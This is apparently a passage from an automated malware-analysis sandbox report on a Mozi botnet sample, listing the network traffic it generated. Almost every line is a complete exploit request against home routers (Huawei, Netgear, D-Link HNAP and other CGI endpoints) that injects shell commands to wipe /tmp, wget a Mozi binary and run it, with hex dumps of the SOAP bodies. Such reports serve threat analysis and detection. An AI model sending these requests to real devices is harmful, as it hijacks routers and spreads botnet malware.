2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 112.166.114.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 197.72.9.100:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 63.164.211.208:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 98.179.93.63:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 79.132.196.216:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 220.130.230.90:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.0.98.124:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 113.129.108.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 